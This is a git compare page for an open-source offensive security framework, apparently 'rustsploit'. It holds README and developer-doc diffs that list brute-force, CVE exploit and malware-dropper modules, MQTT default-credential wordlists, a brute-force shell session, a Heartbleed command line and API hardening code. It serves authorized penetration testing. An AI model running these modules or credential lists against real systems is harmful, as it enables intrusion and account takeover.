mirror of
https://github.com/s-b-repo/rustsploit
synced 2026-06-27 09:54:12 +00:00
Compare commits
30 Commits
beta-testing
...
v0.4.0
| Author | SHA1 | Date | |
|---|---|---|---|
| 30396b2414 | |||
| a24d9c79de | |||
| aed7b0b93e | |||
| c26a0f116c | |||
| 7a781ae2fa | |||
| ba3a6480d2 | |||
| ae435a2143 | |||
| 20b610a1d5 | |||
| 9de9f0a8c9 | |||
| 66964ba639 | |||
| cb3ad7c22d | |||
| 423b0e0838 | |||
| cb053d5be3 | |||
| 39c8d8ccc8 | |||
| b2c85875fa | |||
| ee6d4e399e | |||
| 8af6d45e32 | |||
| a0c8c723dc | |||
| 97c366a846 | |||
| 7fc4148202 | |||
| ab8256fc19 | |||
| 3403cec7f9 | |||
| 99e31b1c2f | |||
| c9e93614a4 | |||
| 227dc38663 | |||
| b1ca5f1151 | |||
| 6c153eee99 | |||
| c9712dc4a9 | |||
| be1c4158af | |||
| 26913cdbf6 |
+3
-3
@@ -1,7 +1,7 @@
|
||||
[package]
|
||||
name = "rustsploit"
|
||||
version = "0.3.5"
|
||||
edition = "2021"
|
||||
edition = "2024"
|
||||
build = "build.rs"
|
||||
|
||||
[[bin]]
|
||||
@@ -87,7 +87,7 @@ chrono = { version = "0.4", features = ["serde"] }
|
||||
# API Server (Axum)
|
||||
axum = "0.7"
|
||||
tower = "0.5"
|
||||
tower-http = { version = "0.6", features = ["cors", "trace"] }
|
||||
tower-http = { version = "0.6", features = ["cors", "trace", "limit"] }
|
||||
uuid = { version = "1.10", features = ["v4"] }
|
||||
|
||||
# DNS
|
||||
@@ -96,7 +96,7 @@ hickory-proto = "0.24"
|
||||
|
||||
# Misc utilities
|
||||
once_cell = "1.19"
|
||||
home = "=0.5.11" # pinned for edition 2021 compatibility
|
||||
home = "0.5" # updated for edition 2024 compatibility
|
||||
|
||||
[build-dependencies]
|
||||
regex = "1.11"
|
||||
|
||||
@@ -31,15 +31,22 @@ Modular offensive tooling for embedded targets, written in Rust and inspired by
|
||||
|
||||
## Highlights
|
||||
|
||||
- ✅ **Auto-discovered modules:** `build.rs` indexes `src/modules/**` so new code drops in without manual registration
|
||||
- ✅ **Interactive shell with color and shortcuts:** Quick command palette, target/module state tracking, alias commands (`help/?`, `modules/m`, `run/go`, etc.)
|
||||
- ✅ **Ergonomic proxy system:** Load lists, validate availability, choose concurrency/timeouts, and rotate automatically on failure
|
||||
- ✅ **Comprehensive credential tooling:** FTP(S), SSH, Telnet, POP3(S), SMTP, RDP, RTSP brute force modules with IPv6 and TLS support where applicable
|
||||
- ✅ **Exploit coverage:** Apache Tomcat, Abus security cameras, Ivanti Connect Secure, TP-Link, Zabbix, Avtech cameras, Spotube, OpenSSH race condition, and more
|
||||
- ✅ **Scanners & utilities:** Port scanner, ping sweep, SSDP discovery, HTTP title grabber, StalkRoute traceroute (root), sample modules for extension
|
||||
- ✅ **Payload generation:** Batch malware dropper (`narutto_dropper`), BAT payload generator, custom credential checkers
|
||||
- ✅ **Readable output:** Colored prompts, structured status messages, optional verbose logs and result persistence
|
||||
- ✅ **REST API Server:** Launch a secure API server with authentication, rate limiting, IP tracking, and dynamic key rotation
|
||||
- **Auto-discovered modules:** `build.rs` indexes `src/modules/**` so new code drops in without manual registration
|
||||
- **Interactive shell with color and shortcuts:** Quick command palette, target/module state tracking, alias commands (`help/?`, `modules/m`, `run/go`, etc.)
|
||||
- **Ergonomic proxy system:** Load lists, validate availability, choose concurrency/timeouts, and rotate automatically on failure
|
||||
- **Comprehensive credential tooling:** FTP(S), SSH, Telnet, POP3(S), SMTP, RDP, RTSP, SNMP, L2TP, MQTT, Fortinet brute force modules with IPv6 and TLS support where applicable
|
||||
- **Enhanced Telnet module:** Full IAC (Interpret As Command) negotiation, advanced error classification, verbose quick-check mode, robust buffer handling
|
||||
- **Improved RDP module:** Streaming failover for large password files (>150MB), comprehensive error classification, multiple security level support (NLA/TLS/RDP/Negotiate/Auto)
|
||||
- **Framework-level honeypot detection:** Automatic detection before scans using 200 common ports (warns if 11+ ports open)
|
||||
- **Advanced target normalization:** Supports IPv4, IPv6, hostnames, URLs, CIDR notation with comprehensive validation
|
||||
- **Exploit coverage:** Apache Tomcat, Abus security cameras, Ivanti Connect Secure, TP-Link, Zabbix, Avtech cameras, Spotube, OpenSSH race condition, and more
|
||||
- **Scanners & utilities:** Port scanner, ping sweep, SSDP discovery, HTTP title grabber, DNS recursion tester, HTTP method scanner, StalkRoute traceroute (root)
|
||||
- **Payload generation:** Batch malware dropper (`narutto_dropper`), BAT payload generator, custom credential checkers
|
||||
- **Readable output:** Colored prompts, structured status messages, optional verbose logs and result persistence
|
||||
- **REST API Server:** Launch a secure API server with authentication, rate limiting, IP tracking, and dynamic key rotation
|
||||
- **Security hardened:** Comprehensive input validation, path traversal protection, length limits, and memory-safe operations throughout
|
||||
- **Honeypot detection:** Framework-level automatic detection before module execution to warn about potentially deceptive targets
|
||||
- **Enhanced target handling:** Advanced normalization supporting IPv4, IPv6 (with brackets), hostnames, URLs, CIDR notation, and port extraction
|
||||
|
||||
---
|
||||
|
||||
@@ -49,11 +56,11 @@ Rustsploit ships categorized modules under `src/modules/`, automatically exposed
|
||||
|
||||
| Category | Highlights |
|
||||
|----------|------------|
|
||||
| `creds/generic` | FTP anonymous & FTPS brute force, SSH brute force, Telnet brute force, POP3(S) brute force, SMTP brute force, RTSP brute force (path + header bruting), RDP auth-only brute |
|
||||
| `exploits/*` | Apache Tomcat (CVE-2025-24813 RCE, CatKiller CVE-2025-31650), TP-Link VN020 / WR740N DoS, Abus camera CVE-2023-26609 variants, Ivanti Connect Secure stack buffer overflow, Zabbix 7.0.0 SQLi, Avtech CVE-2024-7029, Spotube zero-day, OpenSSH 9.8p1 race condition, Uniview password disclosure, ACTi camera RCE |
|
||||
| `scanners` | Port scanner, ping sweep, SSDP M-SEARCH enumerator, HTTP title fetcher, DNS recursion/amplification tester, StalkRoute traceroute (firewall evasion) |
|
||||
| `creds/generic` | FTP anonymous & FTPS brute force, SSH brute force, SSH user enumeration (timing attack), SSH password spray, **Telnet brute force (with IAC negotiation)**, POP3(S) brute force, SMTP brute force, RTSP brute force (path + header bruting), **RDP auth-only brute (streaming mode, multiple security levels)**, **MQTT brute force**, SNMP community string brute force, L2TP/IPsec brute force, Fortinet SSL VPN brute force |
|
||||
| `exploits/*` | Apache Tomcat (CVE-2025-24813 RCE, CatKiller CVE-2025-31650), TP-Link VN020 / WR740N DoS, Abus camera CVE-2023-26609 variants, Ivanti Connect Secure stack buffer overflow, Zabbix 7.0.0 SQLi, Avtech CVE-2024-7029, Spotube zero-day, OpenSSH 9.8p1 race condition, Uniview password disclosure, ACTi camera RCE, Flowise CVE-2025-59528 RCE, HTTP/2 Rapid Reset DoS, Jenkins LFI, PAN-OS Auth Bypass, Heartbleed, **SSHPWN Framework** (SFTP symlink/setuid/traversal, SCP injection/DoS, Session env injection) |
|
||||
| `scanners` | Port scanner (TCP/UDP/SYN/ACK), ping sweep (ICMP/TCP/UDP/SYN/ACK), SSDP M-SEARCH enumerator, HTTP title fetcher, HTTP method scanner, DNS recursion/amplification tester, StalkRoute traceroute (firewall evasion), **SSH scanner** (banner grabbing, CIDR support) |
|
||||
| `payloadgens` | `narutto_dropper`, BAT payload generator |
|
||||
| `lists` | RTSP wordlists and helper files |
|
||||
| `lists` | RTSP wordlists, telnet default credentials, and helper files |
|
||||
|
||||
Run `modules` or `find <keyword>` in the shell for the authoritative list.
|
||||
|
||||
@@ -148,6 +155,40 @@ Environment variables are written with 0600 permissions so secrets stay private.
|
||||
|
||||
---
|
||||
|
||||
## New Features & Improvements
|
||||
|
||||
### Framework-Level Enhancements
|
||||
|
||||
- **Honeypot Detection**: Automatically scans 200 common ports before module execution. If 11+ ports are open, warns that the target is likely a honeypot. This check runs universally on every target after it's set.
|
||||
|
||||
- **Advanced Target Normalization**: The framework now supports:
|
||||
- IPv4: `192.168.1.1`, `192.168.1.1:8080`
|
||||
- IPv6: `::1`, `[::1]`, `[::1]:8080`, `2001:db8::1`
|
||||
- Hostnames: `.com`, `.com:443`
|
||||
- URLs: `http://.com:8080` (extracts host:port)
|
||||
- CIDR notation: `192.168.1.0/24`, `2001:db8::/32`
|
||||
|
||||
All targets are validated for security (DoS prevention, path traversal protection, format validation).
|
||||
|
||||
### Module Improvements
|
||||
|
||||
- **Telnet Bruteforce**:
|
||||
- Full Telnet IAC (Interpret As Command) negotiation support
|
||||
- Enhanced error classification (connection, DNS, authentication, protocol, I/O, timeout errors)
|
||||
- Verbose mode for quick checks showing all attempts and detailed statistics
|
||||
- Improved buffer handling and memory management
|
||||
|
||||
- **RDP Bruteforce**:
|
||||
- Automatic streaming failover for password files >150MB to prevent memory exhaustion
|
||||
- Comprehensive error classification (ConnectionFailed, AuthenticationFailed, CertificateError, Timeout, NetworkError, ProtocolError, ToolNotFound, Unknown)
|
||||
- Support for multiple RDP security levels: Auto, NLA, TLS, RDP, Negotiate
|
||||
- Command injection prevention in external tool calls
|
||||
|
||||
- **MQTT Bruteforce**:
|
||||
- Full MQTT 3.1.1 protocol implementation
|
||||
- Proper CONNECT packet construction with variable-length encoding
|
||||
- CONNACK response parsing and error classification
|
||||
|
||||
## Interactive Shell Walkthrough
|
||||
|
||||
The shell tracks current module, target, and proxy state. All commands are case-insensitive and support aliases:
|
||||
@@ -169,9 +210,9 @@ show_proxies show_proxies | proxies View proxy status
|
||||
exit exit | quit | q Leave shell
|
||||
```
|
||||
|
||||
Example session:
|
||||
session:
|
||||
|
||||
```text
|
||||
```
|
||||
rsf> f1 ssh
|
||||
rsf> u creds/generic/ssh_bruteforce
|
||||
rsf> set target 10.10.10.10
|
||||
@@ -289,7 +330,7 @@ Authorization: ApiKey your-api-key-here
|
||||
curl -H "Authorization: Bearer your-api-key" http://localhost:8080/api/auth-failures
|
||||
```
|
||||
|
||||
### telnet config example
|
||||
### telnet config
|
||||
```
|
||||
{
|
||||
"port": 23,
|
||||
@@ -322,12 +363,20 @@ Authorization: ApiKey your-api-key-here
|
||||
|
||||
### Security Features
|
||||
|
||||
#### Input Validation & Security
|
||||
- **Request Body Limiting:** Maximum 1MB request body to prevent DoS attacks
|
||||
- **API Key Validation:** Keys must be printable ASCII, max 256 characters
|
||||
- **Target Validation:** All targets are validated for length, control characters, and path traversal
|
||||
- **Module Path Sanitization:** Module names are validated against path traversal and injection attacks
|
||||
- **Resource Limits:** Automatic cleanup when tracked IPs or auth failures exceed 100,000 entries
|
||||
|
||||
#### Rate Limiting
|
||||
- IPs are automatically blocked for **30 seconds** after **3 failed authentication attempts**
|
||||
- Blocked IPs receive HTTP `429 Too Many Requests` responses
|
||||
- Failed attempts are logged to both terminal and log file
|
||||
- Counter resets automatically after the block period expires
|
||||
- Successful authentication resets the failure counter for that IP
|
||||
- Automatic cleanup of expired blocks and entries older than 1 hour
|
||||
|
||||
#### Hardening Mode
|
||||
When `--harden` is enabled:
|
||||
@@ -335,6 +384,7 @@ When `--harden` is enabled:
|
||||
- Automatically rotates the API key when the number of unique IPs exceeds the limit (default: 10)
|
||||
- Logs all rotation events to terminal and `rustsploit_api.log`
|
||||
- Clears IP tracking after key rotation
|
||||
- Automatic pruning when tracker exceeds 100,000 entries
|
||||
|
||||
#### Logging
|
||||
All API activity is logged to:
|
||||
@@ -347,8 +397,9 @@ Log entries include:
|
||||
- IP tracking and hardening actions
|
||||
- Key rotation events
|
||||
- Module execution results
|
||||
- Resource cleanup operations
|
||||
|
||||
### Example API Workflow
|
||||
### API Workflow
|
||||
|
||||
```
|
||||
# 1. Start the API server
|
||||
@@ -382,7 +433,7 @@ Rustsploit treats proxy lists as first-class citizens:
|
||||
- Accepts HTTP, HTTPS, SOCKS4, SOCKS4a, SOCKS5, and SOCKS5h entries
|
||||
- Loads from user-supplied files, skipping invalid lines with reasons
|
||||
- Optional connectivity test prompts allow tuning:
|
||||
- Test URL (default `https://example.com`)
|
||||
- Test URL (default `https://.com`)
|
||||
- Timeout (seconds)
|
||||
- Max concurrent checks
|
||||
- Keeps only working proxies when validation is requested
|
||||
@@ -396,11 +447,11 @@ Environment variables (`ALL_PROXY`, `HTTP_PROXY`, `HTTPS_PROXY`) are managed tra
|
||||
|
||||
Rustsploit scans `src/modules/` recursively during build. Each module should expose:
|
||||
|
||||
```rust
|
||||
```
|
||||
pub async fn run(target: &str) -> anyhow::Result<()>;
|
||||
```
|
||||
|
||||
Optional interactive entry points (`run_interactive`) can coexist. Module paths are referenced relative to `src/modules/`, for example:
|
||||
Optional interactive entry points (`run_interactive`) can coexist. Module paths are referenced relative to `src/modules/`, for :
|
||||
|
||||
- File: `src/modules/exploits/sample_exploit.rs`
|
||||
- Shell path: `exploits/sample_exploit`
|
||||
|
||||
+1973
File diff suppressed because it is too large
Load Diff
+174
-21
@@ -12,12 +12,13 @@
|
||||
4. [Shell Architecture](#shell-architecture)
|
||||
5. [Proxy Subsystem](#proxy-subsystem)
|
||||
6. [Command-Line Interface](#command-line-interface)
|
||||
7. [Authoring Modules](#authoring-modules)
|
||||
8. [Credential Modules: Best Practices](#credential-modules-best-practices)
|
||||
9. [Exploit Modules: Best Practices](#exploit-modules-best-practices)
|
||||
10. [Utilities & Helpers](#utilities--helpers)
|
||||
11. [Testing & QA](#testing--qa)
|
||||
12. [Roadmap & Ideas](#roadmap--ideas)
|
||||
7. [Security & Input Validation](#security--input-validation)
|
||||
8. [Authoring Modules](#authoring-modules)
|
||||
9. [Credential Modules: Best Practices](#credential-modules-best-practices)
|
||||
10. [Exploit Modules: Best Practices](#exploit-modules-best-practices)
|
||||
11. [Utilities & Helpers](#utilities--helpers)
|
||||
12. [Testing & QA](#testing--qa)
|
||||
13. [Roadmap & Ideas](#roadmap--ideas)
|
||||
|
||||
---
|
||||
|
||||
@@ -36,14 +37,16 @@ Rustsploit is a Rust-first re-imagining of RouterSploit:
|
||||
|
||||
## Code Layout
|
||||
|
||||
```text
|
||||
```
|
||||
rustsploit/
|
||||
├── Cargo.toml
|
||||
├── build.rs # Generates dispatcher code by scanning src/modules
|
||||
├── src/
|
||||
│ ├── main.rs # Entry point, selects CLI or shell mode
|
||||
│ ├── main.rs # Entry point, selects CLI or shell mode (includes input validation)
|
||||
│ ├── cli.rs # Clap-based CLI parser and dispatcher
|
||||
│ ├── shell.rs # Interactive shell loop + UX helpers
|
||||
│ ├── shell.rs # Interactive shell loop + UX helpers (includes sanitization)
|
||||
│ ├── api.rs # REST API server with auth, rate limiting, and security
|
||||
│ ├── config.rs # Global configuration with target validation
|
||||
│ ├── commands/ # Dispatch glue for exploits/scanners/creds
|
||||
│ │ ├── mod.rs
|
||||
│ │ ├── exploit.rs
|
||||
@@ -56,13 +59,14 @@ rustsploit/
|
||||
│ │ ├── exploits/
|
||||
│ │ ├── scanners/
|
||||
│ │ └── creds/
|
||||
│ └── utils.rs # Shared helpers (proxy parsing, module lookup, etc.)
|
||||
│ └── utils.rs # Shared helpers (proxy parsing, module lookup, validation)
|
||||
├── docs/
|
||||
│ └── readme.md # This document
|
||||
├── lists/
|
||||
│ ├── readme.md # Wordlist + data file catalogue
|
||||
│ ├── rtsp-paths.txt
|
||||
│ └── rtsphead.txt
|
||||
│ ├── rtsphead.txt
|
||||
│ └── telnet-default/ # Default telnet credentials
|
||||
└── README.md # Product overview
|
||||
```
|
||||
|
||||
@@ -126,7 +130,7 @@ Proxies are set globally via environment variables so both module HTTP requests
|
||||
|
||||
Example:
|
||||
|
||||
```bash
|
||||
```
|
||||
cargo run -- --command exploit --module heartbleed --target 203.0.113.12
|
||||
```
|
||||
|
||||
@@ -134,11 +138,125 @@ If the module needs additional parameters, it can prompt interactively (e.g., br
|
||||
|
||||
---
|
||||
|
||||
## Security & Input Validation
|
||||
|
||||
RustSploit implements comprehensive security measures throughout the codebase. When contributing, follow these guidelines:
|
||||
|
||||
### Input Validation Constants
|
||||
|
||||
Located across core modules, these constants enforce safe limits:
|
||||
|
||||
| File | Constant | Value | Purpose |
|
||||
|------|----------|-------|---------|
|
||||
| `shell.rs` | `MAX_INPUT_LENGTH` | 4096 | Maximum shell input length |
|
||||
| `shell.rs` | `MAX_TARGET_LENGTH` | 512 | Maximum target string length |
|
||||
| `shell.rs` | `MAX_URL_LENGTH` | 2048 | Maximum URL length |
|
||||
| `shell.rs` | `MAX_PATH_LENGTH` | 4096 | Maximum file path length |
|
||||
| `shell.rs` | `MAX_PROXY_LIST_SIZE` | 10,000 | Maximum proxy entries |
|
||||
| `utils.rs` | `MAX_FILE_SIZE` | 10MB | Maximum file size to read |
|
||||
| `utils.rs` | `MAX_PROXIES` | 100,000 | Maximum proxies to process |
|
||||
| `config.rs` | `MAX_HOSTNAME_LENGTH` | 253 | DNS hostname limit |
|
||||
| `api.rs` | `MAX_REQUEST_BODY_SIZE` | 1MB | API request body limit |
|
||||
| `api.rs` | `MAX_TRACKED_IPS` | 100,000 | IP tracker limit |
|
||||
|
||||
### Security Patterns
|
||||
|
||||
When writing modules or core code, follow these patterns:
|
||||
|
||||
#### 1. Input Length Validation
|
||||
```
|
||||
if input.len() > MAX_INPUT_LENGTH {
|
||||
return Err(anyhow!("Input too long (max {} characters)", MAX_INPUT_LENGTH));
|
||||
}
|
||||
```
|
||||
|
||||
#### 2. Control Character Rejection
|
||||
```
|
||||
if input.chars().any(|c| c.is_control()) {
|
||||
return Err(anyhow!("Input cannot contain control characters"));
|
||||
}
|
||||
```
|
||||
|
||||
#### 3. Path Traversal Prevention
|
||||
```
|
||||
if input.contains("..") || input.contains("//") {
|
||||
return Err(anyhow!("Path traversal detected"));
|
||||
}
|
||||
```
|
||||
|
||||
#### 4. Hostname/Target Validation
|
||||
```
|
||||
// Use the framework's normalize_target function for comprehensive validation
|
||||
use crate::utils::normalize_target;
|
||||
|
||||
let normalized = normalize_target(raw_target)?;
|
||||
// This handles IPv4, IPv6, hostnames, URLs, CIDR notation with full validation
|
||||
```
|
||||
|
||||
For manual validation:
|
||||
```
|
||||
use regex::Regex;
|
||||
let valid_chars = Regex::new(r"^[a-zA-Z0-9.\-_:\[\]]+$").unwrap();
|
||||
if !valid_chars.is_match(target) {
|
||||
return Err(anyhow!("Invalid characters in target"));
|
||||
}
|
||||
```
|
||||
|
||||
#### 5. Overflow Protection
|
||||
```
|
||||
// Use saturating_add to prevent overflow
|
||||
counter = counter.saturating_add(1);
|
||||
```
|
||||
|
||||
#### 6. Prompt Attempt Limiting
|
||||
```
|
||||
const MAX_ATTEMPTS: u8 = 10;
|
||||
let mut attempts = 0;
|
||||
loop {
|
||||
attempts += 1;
|
||||
if attempts > MAX_ATTEMPTS {
|
||||
println!("Too many invalid attempts. Using default.");
|
||||
return Ok(default);
|
||||
}
|
||||
// ... prompt logic
|
||||
}
|
||||
```
|
||||
|
||||
### API Security
|
||||
|
||||
The API server (`api.rs`) implements:
|
||||
|
||||
- **Request Body Limiting:** `RequestBodyLimitLayer` prevents DoS via large payloads
|
||||
- **Rate Limiting:** 3 failed auth attempts = 30 second block
|
||||
- **Auto-cleanup:** Old entries purged when limits exceeded
|
||||
- **IP Tracking:** With automatic rotation when suspicious activity detected
|
||||
|
||||
### File Operations
|
||||
|
||||
When reading files, always:
|
||||
1. Validate the path doesn't contain `..`
|
||||
2. Use `canonicalize()` to resolve the real path
|
||||
3. Check file size before reading
|
||||
4. Skip symlinks for security
|
||||
|
||||
### Honeypot Detection
|
||||
|
||||
The framework automatically runs honeypot detection before module execution when a target is set. The `basic_honeypot_check` function in `utils.rs`:
|
||||
|
||||
- Scans 200 common ports with 250ms timeout per port
|
||||
- If 11+ ports are open, warns that the target is likely a honeypot
|
||||
- Runs automatically in the shell's `run` and `run_all` commands
|
||||
- Can be called manually: `utils::basic_honeypot_check(&ip).await`
|
||||
|
||||
This helps operators identify potentially deceptive targets before spending time on them.
|
||||
|
||||
---
|
||||
|
||||
## Authoring Modules
|
||||
|
||||
Every module must export:
|
||||
|
||||
```rust
|
||||
```
|
||||
use anyhow::Result;
|
||||
|
||||
pub async fn run(target: &str) -> Result<()> {
|
||||
@@ -157,9 +275,9 @@ Guidelines:
|
||||
6. **Wordlists / resources:** store under `lists/` and document them in `lists/readme.md`.
|
||||
7. **Optional interactive mode:** If the module benefits from multiple code paths, optionally expose `run_interactive` and call it from `run`.
|
||||
|
||||
### Example skeleton
|
||||
### skeleton
|
||||
|
||||
```rust
|
||||
```
|
||||
use anyhow::{Context, Result};
|
||||
|
||||
pub async fn run(target: &str) -> Result<()> {
|
||||
@@ -187,17 +305,39 @@ pub async fn run(target: &str) -> Result<()> {
|
||||
|
||||
## Credential Modules: Best Practices
|
||||
|
||||
Modules like FTP/SSH/Telnet/POP3/SMTP/RTSP/RDP follow shared patterns:
|
||||
Modules like FTP/SSH/Telnet/POP3/SMTP/RTSP/RDP/MQTT follow shared patterns:
|
||||
|
||||
- **Input prompts:** ask for port, username/password wordlists, concurrency limit, stop-on-success toggle, output file, verbose logging.
|
||||
- **Sanitation:** trim wordlist entries, skip blanks, provide early exits if lists are empty.
|
||||
- **Concurrency:**
|
||||
- Use `tokio::Semaphore` for asynchronous modules (FTP, SSH).
|
||||
- Use `tokio::Semaphore` for asynchronous modules (FTP, SSH, MQTT).
|
||||
- Use `threadpool` + `crossbeam-channel` for synchronous protocols (Telnet, POP3, SMTP).
|
||||
- **Adaptive throttling:** Some modules (FTP) sample CPU/RAM to avoid saturating the host.
|
||||
- **TLS/STARTTLS:** Accept invalid certs for offensive tooling convenience, but note this clearly.
|
||||
- **Result persistence:** Offer to write `host -> user:pass` pairs to a local file (in `./` by default).
|
||||
- **IPv6:** Use helpers like `format_addr` to wrap IPv6 addresses in brackets and support port suffixes.
|
||||
- **Error classification:** Implement comprehensive error types (ConnectionFailed, AuthenticationFailed, Timeout, etc.) for better debugging and reporting.
|
||||
- **Memory management:** For large wordlists (>150MB), implement streaming mode to prevent memory exhaustion (see RDP module for reference).
|
||||
- **Protocol compliance:** Implement full protocol support where applicable (e.g., Telnet IAC negotiation, MQTT 3.1.1).
|
||||
|
||||
### Recent Module Enhancements
|
||||
|
||||
- **Telnet Module**:
|
||||
- Full IAC (Interpret As Command) negotiation with proper option handling
|
||||
- Enhanced error classification with specific error types
|
||||
- Verbose mode for quick checks with detailed attempt reporting
|
||||
- Improved buffer handling using `BytesMut` with size limits
|
||||
|
||||
- **RDP Module**:
|
||||
- Streaming failover for password files >150MB
|
||||
- Comprehensive error classification with 8 error types
|
||||
- Multiple security level support (Auto, NLA, TLS, RDP, Negotiate)
|
||||
- Command injection prevention via argument sanitization
|
||||
|
||||
- **MQTT Module**:
|
||||
- Full MQTT 3.1.1 protocol implementation
|
||||
- Proper variable-length encoding and UTF-8 string encoding
|
||||
- CONNACK response parsing with error classification
|
||||
|
||||
---
|
||||
|
||||
@@ -215,9 +355,22 @@ Modules like FTP/SSH/Telnet/POP3/SMTP/RTSP/RDP follow shared patterns:
|
||||
|
||||
`src/utils.rs` provides:
|
||||
|
||||
- `normalize_target`: wrap IPv6 addresses in brackets, pass through IPv4/hosts untouched.
|
||||
- `module_exists` / `list_all_modules` / `find_modules`: used by shell to present module inventory.
|
||||
- Proxy helpers described earlier (`load_proxies_from_file`, `test_proxies`, etc.).
|
||||
- **`normalize_target`**: Comprehensive target normalization supporting:
|
||||
- IPv4: `192.168.1.1`, `192.168.1.1:8080`
|
||||
- IPv6: `::1`, `[::1]`, `[::1]:8080`, `2001:db8::1`
|
||||
- Hostnames: `example.com`, `example.com:443`
|
||||
- URLs: `http://example.com:8080` (extracts host:port)
|
||||
- CIDR notation: `192.168.1.0/24`, `2001:db8::/32`
|
||||
|
||||
Includes comprehensive validation (DoS prevention, path traversal protection, format validation).
|
||||
|
||||
- **`extract_ip_from_target`**: Extracts IP address or hostname from normalized target strings, handling ports, brackets, and CIDR notation.
|
||||
|
||||
- **`basic_honeypot_check`**: Framework-level honeypot detection that scans 200 common ports. If 11+ ports are open, warns that the target is likely a honeypot. This runs automatically before module execution when a target is set.
|
||||
|
||||
- **`module_exists` / `list_all_modules` / `find_modules`**: Used by shell to present module inventory.
|
||||
|
||||
- **Proxy helpers**: `load_proxies_from_file`, `test_proxies`, etc. (described earlier).
|
||||
|
||||
Feel free to expand this file with reusable pieces (e.g., credential loader, HTTP header templates) to avoid duplication inside modules.
|
||||
|
||||
@@ -250,4 +403,4 @@ Contributions are welcome—open an issue or start a discussion before large ref
|
||||
|
||||
---
|
||||
|
||||
Happy hacking, and remember: **authorized testing only**. Commit messages and module descriptions should always reflect controlled research usage. !*** End Patch
|
||||
Happy hacking, and remember: **authorized testing only**. Commit messages and module descriptions should always reflect controlled research usage. !***
|
||||
|
||||
@@ -44,23 +44,6 @@ Here is the original module that needs to be refactored:
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
Strict Requirements:
|
||||
|
||||
|
||||
@@ -0,0 +1,15 @@
|
||||
public
|
||||
guest
|
||||
sysadmin
|
||||
hivemq
|
||||
emonpimqtt2016
|
||||
mosquitto
|
||||
mqttpassword
|
||||
password
|
||||
[auto-generated]
|
||||
[empty]
|
||||
[printed on PLC]
|
||||
password
|
||||
password
|
||||
password
|
||||
bitnami
|
||||
@@ -0,0 +1,15 @@
|
||||
admin
|
||||
guest
|
||||
sysadmin@thingsboard.org
|
||||
admin
|
||||
emonpi
|
||||
mosquitto
|
||||
mqttuser
|
||||
admin
|
||||
homeassistant
|
||||
DVES_USER
|
||||
admin
|
||||
roger
|
||||
sub_client
|
||||
pub_client
|
||||
user
|
||||
+19
-4
@@ -6,10 +6,14 @@ This directory contains reference lists and helper payloads consumed by modules
|
||||
|
||||
## Available Files
|
||||
|
||||
| File | Used By | Description |
|
||||
|------|---------|-------------|
|
||||
| File / Directory | Used By | Description |
|
||||
|------------------|---------|-------------|
|
||||
| `rtsp-paths.txt` | `creds/generic/rtsp_bruteforce_advanced.rs` | Candidate RTSP paths to brute force when enumerating stream URLs (e.g., `/live.sdp`, `/Streaming/channels/101`). One entry per line; comments can be added with `#` at the start of a line. |
|
||||
| `rtsphead.txt` | `creds/generic/rtsp_bruteforce_advanced.rs` | Optional RTSP header templates. When the user enables “advanced headers,” the module loads this file and injects each header line into outbound requests. Keep headers in `Key: Value` form. |
|
||||
| `rtsphead.txt` | `creds/generic/rtsp_bruteforce_advanced.rs` | Optional RTSP header templates. When the user enables "advanced headers," the module loads this file and injects each header line into outbound requests. Keep headers in `Key: Value` form. |
|
||||
| `telnet-default/` | `creds/generic/telnet_bruteforce.rs` | Default credentials for telnet brute forcing. |
|
||||
| `telnet-default/usernames.txt` | Telnet bruteforce | Common usernames for telnet authentication (root, admin, user, etc.). |
|
||||
| `telnet-default/passwords.txt` | Telnet bruteforce | Common passwords for telnet authentication. |
|
||||
| `telnet-default/empty.txt` | Telnet bruteforce | Placeholder file for configurations that don't require a password list. |
|
||||
|
||||
---
|
||||
|
||||
@@ -29,5 +33,16 @@ This directory contains reference lists and helper payloads consumed by modules
|
||||
- `telnet-banners.txt` to fingerprint devices before brute forcing
|
||||
- `http-admin-panels.txt` for web interface discovery scanners
|
||||
- Vendor-specific RTSP or ONVIF endpoint lists
|
||||
- `snmp-community-strings.txt` for SNMP brute forcing
|
||||
- `fortinet-users.txt` for Fortinet SSL VPN testing
|
||||
- `ssh-default-creds.txt` for common SSH credentials
|
||||
|
||||
Pull requests welcome—please include both the data file and an entry here. !*** End Patch
|
||||
## Security Notes
|
||||
|
||||
When contributing wordlists:
|
||||
- **No malicious payloads:** Lists should contain credentials/paths only, not exploit code
|
||||
- **Respect file size limits:** Keep lists under 10MB (framework limit for file reading)
|
||||
- **UTF-8 encoding:** Use UTF-8 text encoding for all files
|
||||
- **Line format:** One entry per line, use `#` or `//` for comments
|
||||
|
||||
Pull requests welcome—please include both the data file and an entry here.
|
||||
|
||||
BIN
Binary file not shown.
|
Before Width: | Height: | Size: 116 KiB After Width: | Height: | Size: 435 KiB |
+60
-4
@@ -21,11 +21,23 @@ use tokio::{
|
||||
sync::RwLock,
|
||||
};
|
||||
use tower::ServiceBuilder;
|
||||
use tower_http::trace::TraceLayer;
|
||||
use tower_http::{
|
||||
trace::TraceLayer,
|
||||
limit::RequestBodyLimitLayer,
|
||||
};
|
||||
use uuid::Uuid;
|
||||
|
||||
use crate::commands;
|
||||
|
||||
/// Maximum request body size (1MB) to prevent DoS
|
||||
const MAX_REQUEST_BODY_SIZE: usize = 1024 * 1024;
|
||||
|
||||
/// Maximum number of tracked IPs before cleanup
|
||||
const MAX_TRACKED_IPS: usize = 100_000;
|
||||
|
||||
/// Maximum number of auth failure entries
|
||||
const MAX_AUTH_FAILURE_ENTRIES: usize = 100_000;
|
||||
|
||||
#[derive(Clone, Debug)]
|
||||
pub struct ApiKey {
|
||||
pub key: String,
|
||||
@@ -161,14 +173,35 @@ impl ApiState {
|
||||
if !self.harden_enabled {
|
||||
return Ok(false);
|
||||
}
|
||||
|
||||
// Validate IP string length
|
||||
if ip.len() > 128 {
|
||||
return Ok(false);
|
||||
}
|
||||
|
||||
let mut tracker_guard = self.ip_tracker.write().await;
|
||||
let now = Utc::now();
|
||||
|
||||
// Cleanup old entries if we have too many tracked IPs (memory protection)
|
||||
if tracker_guard.len() >= MAX_TRACKED_IPS {
|
||||
// Remove oldest entries (keep most recent half)
|
||||
let mut entries: Vec<_> = tracker_guard.drain().collect();
|
||||
entries.sort_by(|a, b| b.1.last_seen.cmp(&a.1.last_seen));
|
||||
entries.truncate(MAX_TRACKED_IPS / 2);
|
||||
for (k, v) in entries {
|
||||
tracker_guard.insert(k, v);
|
||||
}
